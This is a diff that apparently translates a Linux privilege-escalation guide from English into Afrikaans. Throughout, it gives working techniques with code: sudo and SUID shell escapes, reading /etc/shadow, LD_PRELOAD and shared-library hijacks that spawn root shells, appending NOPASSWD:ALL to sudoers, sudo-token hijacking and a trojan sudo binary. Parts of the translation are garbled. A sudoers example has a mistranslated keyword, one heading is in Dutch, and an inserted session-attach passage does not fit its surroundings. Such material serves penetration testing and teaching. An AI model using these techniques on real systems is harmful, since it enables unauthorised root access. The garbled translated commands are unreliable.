"`xclip -o -selection clipboard 2>/dev/null` - echo "Highlighted text: "`xclip -o 2>/dev/null` - elif [ `which xsel 2>/dev/null` ]; then - echo "Clipboard: "`xsel -ob 2>/dev/null` - echo "Highlighted text: "`xsel -o 2>/dev/null` - else echo "Not found xsel and xclip" - fi +echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` +echo "Highlighted text: "`xclip -o 2>/dev/null` +elif [ `which xsel 2>/dev/null` ]; then +echo "Clipboard: "`xsel -ob 2>/dev/null` +echo "Highlighted text: "`xsel -o 2>/dev/null` +else echo "Not found xsel and xclip" +fi ``` +### Wagwoordbeleid -### Password Policy +'n Wagwoordbeleid is 'n belangrike aspek van die beveiliging van 'n Linux-stelsel. Dit stel die vereistes en beperkings vir die skep en gebruik van wagwoorde op die stelsel. Hier is 'n paar belangrike punte om in gedagte te hou wanneer dit kom by 'n wagwoordbeleid: +- **Lengte**: Die lengte van 'n wagwoord moet voldoende lank wees om dit moeilik te maak vir aanvallers om te raai. Dit word aanbeveel dat wagwoorde ten minste 8 karakters lank moet wees. +- **Kompleksiteit**: Wagwoorde moet kompleks wees en 'n kombinasie van hoofletters, kleinletters, syfers en spesiale karakters insluit. Dit maak dit moeiliker vir aanvallers om wagwoorde te kraak deur middel van kragtige aanvalle. +- **Verandering van wagwoorde**: Dit is belangrik om gebruikers te dwing om hul wagwoorde gereeld te verander. Dit verminder die risiko van 'n aanvaller wat 'n wagwoord verkry en dit vir 'n lang tydperk gebruik. +- **Wagwoordhergebruik**: Gebruikers moet aangemoedig word om nie dieselfde wagwoord vir verskillende rekeninge te gebruik nie. Dit verminder die risiko van 'n aanvaller wat toegang tot al die rekeninge verkry as een wagwoord gekraak word. +- **Wagwoordhantering**: Gebruikers moet bewus gemaak word van die belangrikheid van die veilige hantering van hul wagwoorde. Dit sluit in om wagwoorde nie met ander te deel nie en om hulle wagwoorde veilig te stoor. + +Deur 'n streng wagwoordbeleid te implementeer en gebruikers op te voed oor die belangrikheid van veilige wagwoordpraktyke, kan die risiko van wagwoordgebaseerde aanvalle op 'n Linux-stelsel verminder word. ```bash grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs ``` +### Bekende wagwoorde -### Known passwords - -If you **know any password** of the environment **try to login as each user** using the password. +As jy enige wagwoord van die omgewing **ken**, probeer om as elke gebruiker in te teken met die wagwoord. ### Su Brute -If don't mind about doing a lot of noise and `su` and `timeout` binaries are present on the computer, you can try to brute-force user using [su-bruteforce](https://github.com/carlospolop/su-bruteforce).\ -[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) with `-a` parameter also try to brute-force users. +As jy nie omgee om baie geraas te maak nie en die `su` en `timeout` binêre lêers op die rekenaar teenwoordig is, kan jy probeer om gebruikers te brute-force deur [su-bruteforce](https://github.com/carlospolop/su-bruteforce) te gebruik.\ +[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) met die `-a` parameter probeer ook om gebruikers te brute-force. -## Writable PATH abuses +## Skryfbare PATH-misbruik ### $PATH -If you find that you can **write inside some folder of the $PATH** you may be able to escalate privileges by **creating a backdoor inside the writable folder** with the name of some command that is going to be executed by a different user (root ideally) and that is **not loaded from a folder that is located previous** to your writable folder in $PATH. +As jy vind dat jy kan **skryf binne 'n sekere vouer van die $PATH**, kan jy bevoorregting verhoog deur **'n agterdeur te skep binne die skryfbare vouer** met die naam van 'n bevel wat deur 'n ander gebruiker (idealiter root) uitgevoer gaan word en wat **nie gelaai word vanaf 'n vouer wat voor jou skryfbare vouer in $PATH geleë is nie**. -### SUDO and SUID - -You could be allowed to execute some command using sudo or they could have the suid bit. Check it using: +### SUDO en SUID +Jy kan toegelaat word om 'n bevel uit te voer met behulp van sudo of hulle kan die suid-bit hê. Kontroleer dit deur die volgende te gebruik: ```bash sudo -l #Check commands you can execute with sudo find / -perm -4000 2>/dev/null #Find all SUID binaries ``` - -Some **unexpected commands allow you to read and/or write files or even execute a command.** For example: - +Sommige **onverwagte opdragte stel jou in staat om lêers te lees en/of skryf, of selfs 'n opdrag uit te voer.** Byvoorbeeld: ```bash sudo awk 'BEGIN {system("/bin/sh")}' sudo find /etc -exec sh -i \; @@ -841,43 +870,33 @@ sudo tar c a.tar -I ./runme.sh a ftp>!/bin/sh less>! ``` - ### NOPASSWD -Sudo configuration might allow a user to execute some command with another user's privileges without knowing the password. - +Sudo-konfigurasie mag 'n gebruiker toelaat om 'n bepaalde opdrag uit te voer met die voorregte van 'n ander gebruiker sonder om die wagwoord te weet nie. ``` $ sudo -l User demo may run the following commands on crashlab: - (root) NOPASSWD: /usr/bin/vim +(root) NOPASSWD: /usr/bin/vim ``` - -In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`. - +In hierdie voorbeeld kan die gebruiker `demo` `vim` as `root` uitvoer, dit is nou maklik om 'n skulp te kry deur 'n ssh-sleutel in die root-gids te voeg of deur `sh` te roep. ``` sudo vim -c '!sh' ``` - ### SETENV -This directive allows the user to **set an environment variable** while executing something: - +Hierdie riglyn stel die gebruiker in staat om **'n omgewingsveranderlike in te stel** terwyl iets uitgevoer word: ```bash $ sudo -l User waldo may run the following commands on admirer: - (ALL) SETENV: /opt/scripts/admin_tasks.sh +(ALL) SETENV: /opt/scripts/admin_tasks.sh ``` - -This example, **based on HTB machine Admirer**, was **vulnerable** to **PYTHONPATH hijacking** to load an arbitrary python library while executing the script as root: - +Hierdie voorbeeld, **gebaseer op die HTB-masjien Admirer**, was **kwesbaar** vir **PYTHONPATH-ontvoering** om 'n willekeurige Python-biblioteek te laai terwyl die skrip as root uitgevoer word: ```bash sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh ``` +### Sudo-uitvoering omzeilen via paden -### Sudo execution bypassing paths - -**Jump** to read other files or use **symlinks**. For example in sudoers file: _hacker10 ALL= (root) /bin/less /var/log/\*_ - +**Spring** om ander lêers te lees of **symlinks** te gebruik. Byvoorbeeld in die sudoers-lêer: _hacker10 ALLES= (root) /bin/less /var/log/\*_ ```bash sudo less /var/logs/anything less>:e /etc/shadow #Jump to read other files using privileged less @@ -887,90 +906,74 @@ less>:e /etc/shadow #Jump to read other files using privileged less ln /etc/shadow /var/log/new sudo less /var/log/new #Use symlinks to read any file ``` - -If a **wildcard** is used (\*), it is even easier: - +As 'n **wildcard** gebruik word (\*), is dit selfs makliker: ```bash sudo less /var/log/../../etc/shadow #Read shadow sudo less /var/log/something /etc/shadow #Red 2 files ``` +**Teenmaatreëls**: [https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/](https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/) -**Countermeasures**: [https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/](https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/) - -### Sudo command/SUID binary without command path - -If the **sudo permission** is given to a single command **without specifying the path**: _hacker10 ALL= (root) less_ you can exploit it by changing the PATH variable +### Sudo-opdrag/SUID-binêre sonder opdragpad +As die **sudo-toestemming** gegee word aan 'n enkele opdrag **sonder om die opdragpad te spesifiseer**: _hacker10 ALL= (root) less_, kan jy dit uitbuit deur die PATH-veranderlike te verander. ```bash export PATH=/tmp:$PATH #Put your backdoor in /tmp and name it "less" sudo less ``` +Hierdie tegniek kan ook gebruik word as 'n **suid** binêre lêer 'n ander opdrag uitvoer sonder om die pad daarna te spesifiseer (kontroleer altyd met **strings** die inhoud van 'n vreemde SUID binêre lêer). -This technique can also be used if a **suid** binary **executes another command without specifying the path to it (always check with** _**strings**_ **the content of a weird SUID binary)**. +[Voorbeelde van payloads om uit te voer.](payloads-to-execute.md) -[Payload examples to execute.](payloads-to-execute.md) +### SUID binêre lêer met opdraggewys -### SUID binary with command path - -If the **suid** binary **executes another command specifying the path**, then, you can try to **export a function** named as the command that the suid file is calling. - -For example, if a suid binary calls _**/usr/sbin/service apache2 start**_ you have to try to create the function and export it: +As die **suid** binêre lêer 'n ander opdrag uitvoer deur die pad te spesifiseer, kan jy probeer om 'n **funksie uit te voer** wat dieselfde naam as die opdrag wat die suid-lêer aanroep, het. +Byvoorbeeld, as 'n suid binêre lêer _**/usr/sbin/service apache2 start**_ aanroep, moet jy probeer om die funksie te skep en uit te voer: ```bash function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; } export -f /usr/sbin/service ``` - -Then, when you call the suid binary, this function will be executed +Dan, wanneer jy die suid-binêre oproep, sal hierdie funksie uitgevoer word ### LD\_PRELOAD & **LD\_LIBRARY\_PATH** -The **LD_PRELOAD** environment variable is used to specify one or more shared libraries (.so files) to be loaded by the loader before all others, including the standard C library (`libc.so`). This process is known as preloading a library. +Die **LD_PRELOAD** omgewingsveranderlike word gebruik om een of meer gedeelde biblioteke (.so-lêers) aan te dui wat deur die laaier voor alle ander biblioteke, insluitend die standaard C-biblioteek (`libc.so`), gelaai moet word. Hierdie proses staan bekend as die voorlaai van 'n biblioteek. -However, to maintain system security and prevent this feature from being exploited, particularly with **suid/sgid** executables, the system enforces certain conditions: +Om egter stelselsekuriteit te handhaaf en te voorkom dat hierdie funksie uitgebuit word, veral met **suid/sgid** uitvoerbare lêers, dwing die stelsel sekere voorwaardes af: -- The loader disregards **LD_PRELOAD** for executables where the real user ID (_ruid_) does not match the effective user ID (_euid_). -- For executables with suid/sgid, only libraries in standard paths that are also suid/sgid are preloaded. - -Privilege escalation can occur if you have the ability to execute commands with `sudo` and the output of `sudo -l` includes the statement **env_keep+=LD_PRELOAD**. This configuration allows the **LD_PRELOAD** environment variable to persist and be recognized even when commands are run with `sudo`, potentially leading to the execution of arbitrary code with elevated privileges. +- Die laaier ignoreer **LD_PRELOAD** vir uitvoerbare lêers waar die werklike gebruikers-ID (_ruid_) nie ooreenstem met die effektiewe gebruikers-ID (_euid_) nie. +- Vir uitvoerbare lêers met suid/sgid word slegs biblioteke in standaard paaie wat ook suid/sgid is, voorafgelaai. +Privilege-escalatie kan plaasvind as jy die vermoë het om opdragte met `sudo` uit te voer en die uitset van `sudo -l` die verklaring **env_keep+=LD_PRELOAD** insluit. Hierdie konfigurasie maak dit moontlik vir die **LD_PRELOAD** omgewingsveranderlike om volhardend te wees en erken te word selfs wanneer opdragte met `sudo` uitgevoer word, wat moontlik kan lei tot die uitvoering van willekeurige kode met verhoogde bevoegdhede. ``` Defaults env_keep += LD_PRELOAD ``` - -Save as **/tmp/pe.c** - +Stoor as **/tmp/pe.c** ```c #include #include #include void _init() { - unsetenv("LD_PRELOAD"); - setgid(0); - setuid(0); - system("/bin/bash"); +unsetenv("LD_PRELOAD"); +setgid(0); +setuid(0); +system("/bin/bash"); } ``` - -Then **compile it** using: - +Dan **kompileer dit** deur die volgende te gebruik: ```bash cd /tmp gcc -fPIC -shared -o pe.so pe.c -nostartfiles ``` - -Finally, **escalate privileges** running - +Uiteindelik, **verhoog voorregte** wat uitgevoer word ```bash sudo LD_PRELOAD=./pe.so #Use any command you can run with sudo ``` - {% hint style="danger" %} -A similar privesc can be abused if the attacker controls the **LD\_LIBRARY\_PATH** env variable because he controls the path where libraries are going to be searched. +'n Soortgelyke privesc kan misbruik word as die aanvaller beheer oor die **LD\_LIBRARY\_PATH** omgewingsveranderlike het, omdat hy die pad beheer waar biblioteke gesoek gaan word. {% endhint %} - ```c #include #include @@ -978,9 +981,9 @@ A similar privesc can be abused if the attacker controls the **LD\_LIBRARY\_PATH static void hijack() __attribute__((constructor)); void hijack() { - unsetenv("LD_LIBRARY_PATH"); - setresuid(0,0,0); - system("/bin/bash -p"); +unsetenv("LD_LIBRARY_PATH"); +setresuid(0,0,0); +system("/bin/bash -p"); } ``` @@ -990,19 +993,15 @@ cd /tmp gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c sudo LD_LIBRARY_PATH=/tmp ``` +### SUID-binêre - .so-injeksie -### SUID Binary – .so injection - -When encountering a binary with **SUID** permissions that seems unusual, it's a good practice to verify if it's loading **.so** files properly. This can be checked by running the following command: - +Wanneer jy 'n binêre lêer met **SUID**-permissies teëkom wat ongewoon lyk, is dit 'n goeie praktyk om te verifieer of dit **.so**-lêers behoorlik laai. Dit kan nagegaan word deur die volgende bevel uit te voer: ```bash strace 2>&1 | grep -i -E "open|access|no such file" ``` +Byvoorbeeld, wanneer jy 'n fout soos _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)"_ teëkom, dui dit op 'n potensiële moontlikheid vir uitbuiting. -For instance, encountering an error like _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)"_ suggests a potential for exploitation. - -To exploit this, one would proceed by creating a C file, say _"/path/to/.config/libcalc.c"_, containing the following code: - +Om hiervan gebruik te maak, sal jy voortgaan deur 'n C-lêer te skep, sê _"/path/to/.config/libcalc.c"_, wat die volgende kode bevat: ```c #include #include @@ -1010,23 +1009,19 @@ To exploit this, one would proceed by creating a C file, say _"/path/to/.config/ static void inject() __attribute__((constructor)); void inject(){ - system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); +system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); } ``` +Hierdie kode, sodra dit gekompileer en uitgevoer word, streef daarna om voorregte te verhoog deur lêerregte te manipuleer en 'n skulp met verhoogde voorregte uit te voer. -This code, once compiled and executed, aims to elevate privileges by manipulating file permissions and executing a shell with elevated privileges. - -Compile the above C file into a shared object (.so) file with: - +Kompileer die bogenoemde C-lêer na 'n gedeelde voorwerp (.so) lêer met: ```bash gcc -shared -o /path/to/.config/libcalc.so -fPIC /path/to/.config/libcalc.c ``` - -Finally, running the affected SUID binary should trigger the exploit, allowing for potential system compromise. +Uiteindelik, die uitvoering van die geaffekteerde SUID-binêre lêer moet die uitbuiting aktiveer, wat potensiële sisteem-oortreding moontlik maak. -## Shared Object Hijacking - +## Gedeelde Objek Kaping ```bash # Lets find a SUID using a non-standard library ldd some_suid @@ -1036,9 +1031,7 @@ something.so => /lib/x86_64-linux-gnu/something.so readelf -d payroll | grep PATH 0x000000000000001d (RUNPATH) Library runpath: [/development] ``` - -Now that we have found a SUID binary loading a library from a folder where we can write, lets create the library in that folder with the necessary name: - +Nou dat ons 'n SUID-binêre lêer gevind het wat 'n biblioteek laai van 'n vouer waarin ons kan skryf, laat ons die biblioteek in daardie vouer skep met die nodige naam: ```c //gcc src.c -fPIC -shared -o /development/libshared.so #include @@ -1047,24 +1040,21 @@ Now that we have found a SUID binary loading a library from a folder where we ca static void hijack() __attribute__((constructor)); void hijack() { - setresuid(0,0,0); - system("/bin/bash -p"); +setresuid(0,0,0); +system("/bin/bash -p"); } ``` - -If you get an error such as - +As jy 'n fout soos die volgende kry: ```shell-session ./suid_bin: symbol lookup error: ./suid_bin: undefined symbol: a_function_name ``` - -that means that the library you have generated need to have a function called `a_function_name`. +Dit beteken dat die biblioteek wat jy gegenereer het 'n funksie genaamd `a_function_name` moet hê. ### GTFOBins -[**GTFOBins**](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. [**GTFOArgs**](https://gtfoargs.github.io/) is the same but for cases where you can **only inject arguments** in a command. +[**GTFOBins**](https://gtfobins.github.io) is 'n saamgestelde lys van Unix-binêre lêers wat deur 'n aanvaller uitgebuit kan word om plaaslike sekuriteitsbeperkings te omseil. [**GTFOArgs**](https://gtfoargs.github.io/) is dieselfde, maar vir gevalle waar jy slegs argumente kan inspuit in 'n opdrag. -The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks. +Die projek versamel wettige funksies van Unix-binêre lêers wat misbruik kan word om beperkte skille te deurgrond, voorregte te verhoog of te handhaaf, lêers oor te dra, bind- en omgekeerde skille te skep, en die ander naseksploitasietake te fasiliteer. > gdb -nx -ex '!sh' -ex quit\ > sudo mysql -e '! /bin/sh'\ @@ -1077,96 +1067,79 @@ The project collects legitimate functions of Unix binaries that can be abused to ### FallOfSudo -If you can access `sudo -l` you can use the tool [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) to check if it finds how to exploit any sudo rule. +As jy toegang het tot `sudo -l`, kan jy die instrument [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) gebruik om te kyk of dit enige sudo-reël kan uitbuit. -### Reusing Sudo Tokens +### Hergebruik van Sudo Tokens -In cases where you have **sudo access** but not the password, you can escalate privileges by **waiting for a sudo command execution and then hijacking the session token**. +In gevalle waar jy **sudo-toegang** het, maar nie die wagwoord nie, kan jy voorregte verhoog deur **te wag vir 'n sudo-opdraguitvoering en dan die sessietoken te kaap**. -Requirements to escalate privileges: +Vereistes om voorregte te verhoog: -* You already have a shell as user "_sampleuser_" -* "_sampleuser_" have **used `sudo`** to execute something in the **last 15mins** (by default that's the duration of the sudo token that allows us to use `sudo` without introducing any password) +* Jy het reeds 'n skil as gebruiker "_sampleuser_" +* "_sampleuser_" het **`sudo` gebruik** om iets in die **laaste 15 minute** uit te voer (standaard is dit die duur van die sudo-token wat ons toelaat om `sudo` te gebruik sonder om enige wagwoord in te voer) * `cat /proc/sys/kernel/yama/ptrace_scope` is 0 -* `gdb` is accessible (you can be able to upload it) +* `gdb` is toeganklik (jy moet dit kan oplaai) -(You can temporarily enable `ptrace_scope` with `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope` or permanently modifying `/etc/sysctl.d/10-ptrace.conf` and setting `kernel.yama.ptrace_scope = 0`) +(Jy kan `ptrace_scope` tydelik aktiveer met `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope` of permanent deur `/etc/sysctl.d/10-ptrace.conf` te wysig en `kernel.yama.ptrace_scope = 0` in te stel) -If all these requirements are met, **you can escalate privileges using:** [**https://github.com/nongiach/sudo\_inject**](https://github.com/nongiach/sudo\_inject) - -* The **first exploit** (`exploit.sh`) will create the binary `activate_sudo_token` in _/tmp_. You can use it to **activate the sudo token in your session** (you won't get automatically a root shell, do `sudo su`): +As al hierdie vereistes voldoen word, **kan jy voorregte verhoog deur gebruik te maak van:** [**https://github.com/nongiach/sudo\_inject**](https://github.com/nongiach/sudo\_inject) +* Die **eerste uitbuiting** (`exploit.sh`) sal die binêre lêer `activate_sudo_token` in _/tmp_ skep. Jy kan dit gebruik om die sudo-token in jou sessie te **aktiveer** (jy sal nie outomaties 'n root-skil kry nie, doen `sudo su`): ```bash bash exploit.sh /tmp/activate_sudo_token sudo su ``` - -* The **second exploit** (`exploit_v2.sh`) will create a sh shell in _/tmp_ **owned by root with setuid** - +* Die **tweede uitbuiting** (`exploit_v2.sh`) sal 'n sh-skulp in _/tmp_ skep **wat deur root besit word met setuid** ```bash bash exploit_v2.sh /tmp/sh -p ``` - -* The **third exploit** (`exploit_v3.sh`) will **create a sudoers file** that makes **sudo tokens eternal and allows all users to use sudo** - +*Die **derde aanval** (`exploit_v3.sh`) sal 'n sudoers-lêer **skep wat sudo-tokens ewig maak en alle gebruikers toelaat om sudo te gebruik**.* ```bash bash exploit_v3.sh sudo su ``` +### /var/run/sudo/ts/\ -### /var/run/sudo/ts/\ - -If you have **write permissions** in the folder or on any of the created files inside the folder you can use the binary [**write\_sudo\_token**](https://github.com/nongiach/sudo\_inject/tree/master/extra\_tools) to **create a sudo token for a user and PID**.\ -For example, if you can overwrite the file _/var/run/sudo/ts/sampleuser_ and you have a shell as that user with PID 1234, you can **obtain sudo privileges** without needing to know the password doing: - +As jy **skryfregte** het in die vouer of op enige van die geskepte lêers binne die vouer, kan jy die binêre [**write\_sudo\_token**](https://github.com/nongiach/sudo\_inject/tree/master/extra\_tools) gebruik om 'n sudo-token vir 'n gebruiker en PID te **skep**.\ +Byvoorbeeld, as jy die lêer _/var/run/sudo/ts/sampleuser_ kan oorskryf en jy het 'n skulp as daardie gebruiker met PID 1234, kan jy **sudo-voorregte verkry** sonder om die wagwoord te weet deur die volgende te doen: ```bash ./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser ``` - ### /etc/sudoers, /etc/sudoers.d -The file `/etc/sudoers` and the files inside `/etc/sudoers.d` configure who can use `sudo` and how. These files **by default can only be read by user root and group root**.\ -**If** you can **read** this file you could be able to **obtain some interesting information**, and if you can **write** any file you will be able to **escalate privileges**. - +Die lêer `/etc/sudoers` en die lêers binne `/etc/sudoers.d` stel in wie `sudo` kan gebruik en hoe. Hierdie lêers **kan standaard slegs deur gebruiker root en groep root gelees word**.\ +**As** jy hierdie lêer **kan lees**, kan jy moontlik **interessante inligting bekom**, en as jy enige lêer **kan skryf**, kan jy bevoorregtinge **verhoog**. ```bash ls -l /etc/sudoers /etc/sudoers.d/ ls -ld /etc/sudoers.d/ ``` - -If you can write you can abuse this permission - +As jy kan skryf, kan jy hierdie toestemming misbruik. ```bash echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers.d/README ``` - -Another way to abuse these permissions: - +'n Ander manier om hierdie toestemmings te misbruik: ```bash -# makes it so every terminal can sudo +# makes it so every terminal can sudo echo "Defaults !tty_tickets" > /etc/sudoers.d/win # makes it so sudo never times out echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win ``` - ### DOAS -There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf` - +Daar is alternatiewe vir die `sudo` binêre lêer soos `doas` vir OpenBSD, onthou om sy konfigurasie te kontroleer by `/etc/doas.conf` ``` permit nopass demo as root cmd vim ``` +### Sudo Oorname -### Sudo Hijacking +As jy weet dat 'n **gebruiker gewoonlik met 'n masjien verbind en `sudo` gebruik** om voorregte te verhoog en jy het 'n skaal binne daardie gebruiker se konteks, kan jy **'n nuwe sudo uitvoerbare lêer skep** wat jou kode as root sal uitvoer en dan die gebruiker se bevel. Verander dan die $PATH van die gebruiker se konteks (byvoorbeeld deur die nuwe pad in .bash\_profile by te voeg), sodat wanneer die gebruiker sudo uitvoer, jou sudo uitvoerbare lêer uitgevoer word. -If you know that a **user usually connects to a machine and uses `sudo`** to escalate privileges and you got a shell within that user context, you can **create a new sudo executable** that will execute your code as root and then the user's command. Then, **modify the $PATH** of the user context (for example adding the new path in .bash\_profile) so when the user executes sudo, your sudo executable is executed. - -Note that if the user uses a different shell (not bash) you will need to modify other files to add the new path. For example[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) modifies `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. You can find another example in [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire\_modules/bashdoor.py) - -Or running something like: +Let daarop dat as die gebruiker 'n ander skil (nie bash nie) gebruik, jy ander lêers moet wysig om die nuwe pad by te voeg. Byvoorbeeld, [sudo-piggyback](https://github.com/APTy/sudo-piggyback) wysig `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. Jy kan 'n ander voorbeeld vind in [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire\_modules/bashdoor.py) +Of voer iets soos die volgende uit: ```bash cat >/tmp/sudo < (0x0068c000) - libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000) - /lib/ld-linux.so.2 (0x005bb000) +linux-gate.so.1 => (0x0068c000) +libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000) +/lib/ld-linux.so.2 (0x005bb000) ``` - -By copying the lib into `/var/tmp/flag15/` it will be used by the program in this place as specified in the `RPATH` variable. - +Deur die lib na `/var/tmp/flag15/` te kopieer, sal die program dit gebruik op hierdie plek soos gespesifiseer in die `RPATH` veranderlike. ``` level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/ level15@nebula:/home/flag15$ ldd ./flag15 - linux-gate.so.1 => (0x005b0000) - libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000) - /lib/ld-linux.so.2 (0x00737000) +linux-gate.so.1 => (0x005b0000) +libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000) +/lib/ld-linux.so.2 (0x00737000) ``` - -Then create an evil library in `/var/tmp` with `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` - +Maak dan 'n kwaadwillige biblioteek in `/var/tmp` met `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` ```c #include #define SHELL "/bin/sh" int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) { - char *file = SHELL; - char *argv[] = {SHELL,0}; - setresuid(geteuid(),geteuid(), geteuid()); - execve(file,argv,0); +char *file = SHELL; +char *argv[] = {SHELL,0}; +setresuid(geteuid(),geteuid(), geteuid()); +execve(file,argv,0); } ``` +## Vermoëns -## Capabilities - -Linux capabilities provide a **subset of the available root privileges to a process**. This effectively breaks up root **privileges into smaller and distinctive units**. Each of these units can then be independently granted to processes. This way the full set of privileges is reduced, decreasing the risks of exploitation.\ -Read the following page to **learn more about capabilities and how to abuse them**: +Linux-vermoëns bied 'n **subgroep van die beskikbare root-voorregte aan 'n proses**. Dit breek effektief root-voorregte op in kleiner en onderskeidende eenhede. Elkeen van hierdie eenhede kan dan onafhanklik aan prosesse toegeken word. Op hierdie manier word die volledige stel voorregte verminder, wat die risiko van uitbuiting verminder.\ +Lees die volgende bladsy om **meer te wete te kom oor vermoëns en hoe om dit te misbruik**: {% content-ref url="linux-capabilities.md" %} [linux-capabilities.md](linux-capabilities.md) {% endcontent-ref %} -## Directory permissions +## Gidsbevoegdhede -In a directory, the **bit for "execute"** implies that the user affected can "**cd**" into the folder.\ -The **"read"** bit implies the user can **list** the **files**, and the **"write"** bit implies the user can **delete** and **create** new **files**. +In 'n gids impliseer die **bit vir "uitvoer"** dat die betrokke gebruiker kan "**cd**" na die gids.\ +Die **"lees"** bit impliseer dat die gebruiker die **lêerlys** kan **lys**, en die **"skryf"** bit impliseer dat die gebruiker **lêers** kan **verwyder** en **nuwe lêers** kan **skep**. -## ACLs +## ACL's -Access Control Lists (ACLs) represent the secondary layer of discretionary permissions, capable of **overriding the traditional ugo/rwx permissions**. These permissions enhance control over file or directory access by allowing or denying rights to specific users who are not the owners or part of the group. This level of **granularity ensures more precise access management**. Further details can be found [**here**](https://linuxconfig.org/how-to-manage-acls-on-linux). - -**Give** user "kali" read and write permissions over a file: +Toegangsbeheerlyste (ACL's) verteenwoordig die sekondêre laag van diskresionêre bevoegdhede, wat in staat is om die tradisionele ugo/rwx-bevoegdhede te **oorheers**. Hierdie bevoegdhede verbeter die beheer oor toegang tot lêers of gids deur regte toe te laat of te weier aan spesifieke gebruikers wat nie die eienaars of deel van die groep is nie. Hierdie vlak van **fynkorrelige beheer verseker meer presiese toegangsbestuur**. Verdere besonderhede kan [**hier**](https://linuxconfig.org/how-to-manage-acls-on-linux) gevind word. +**Gee** gebruiker "kali" lees- en skryfbevoegdhede oor 'n lêer: ```bash setfacl -m u:kali:rw file.txt #Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included) setfacl -b file.txt #Remove the ACL of the file ``` - -**Get** files with specific ACLs from the system: - +**Kry** lêers met spesifieke ACL's van die stelsel: ```bash getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null ``` +## Oop skul sessies -## Open shell sessions +In **ou weergawes** kan jy dalk 'n **skul**-sessie van 'n ander gebruiker (**root**) **kaap**.\ +In die **nuutste weergawes** sal jy slegs in staat wees om aan skerm-sessies van **jou eie gebruiker** te **koppel**. Jy kan egter **interessante inligting binne die sessie vind**. -In **old versions** you may **hijack** some **shell** session of a different user (**root**).\ -In **newest versions** you will be able to **connect** to screen sessions only of **your own user**. However, you could find **interesting information inside the session**. - -### screen sessions hijacking - -**List screen sessions** +### Skerm-sessies kaap +**Lys skerm-sessies op** ```bash screen -ls screen -ls / # Show another user' screen sessions ``` +**Koppel aan 'n sessie** -![](<../../.gitbook/assets/image (130).png>) +Om toegang te verkry tot 'n aktiewe sessie op 'n Linux-stelsel, kan jy die volgende stappe volg: -**Attach to a session** +1. Identifiseer die sessie wat jy wil koppel aan deur die `who` of `w` opdrag uit te voer. Hierdie opdrag sal 'n lys van aktiewe sessies toon, insluitend die gebruikersnaam en die tty (teletipe) waarop die sessie uitgevoer word. +2. Gebruik die `screen` of `tmux` hulpmiddel om aan die sessie te koppel. Hierdie hulpmiddels bied die vermoë om aan te sluit by 'n bestaande sessie sonder om die huidige sessie te onderbreek. + +3. Voer die relevante opdrag in om die sessie te manipuleer of te monitor. + +Hier is 'n voorbeeld van hoe om aan 'n sessie te koppel met behulp van die `screen` hulpmiddel: + +```bash +screen -r +``` + +Hier is 'n voorbeeld van hoe om aan 'n sessie te koppel met behulp van die `tmux` hulpmiddel: + +```bash +tmux attach-session -t +``` + +Onthou om die korrekte sessie-ID te gebruik wanneer jy aan 'n sessie koppel. ```bash screen -dr #The -d is to detach whoever is attached to it screen -dr 3350.foo #In the example of the image screen -x [user]/[session id] ``` +## tmux-sessies kaping -## tmux sessions hijacking - -This was a problem with **old tmux versions**. I wasn't able to hijack a tmux (v2.1) session created by root as a non-privileged user. - -**List tmux sessions** +Dit was 'n probleem met **ou tmux-weergawes**. Ek was nie in staat om 'n tmux (v2.1) sessie wat deur root as 'n nie-bevoorregte gebruiker geskep is, te kaap nie. +**Lys tmux-sessies** ```bash tmux ls ps aux | grep tmux #Search for tmux consoles not using default folder for sockets tmux 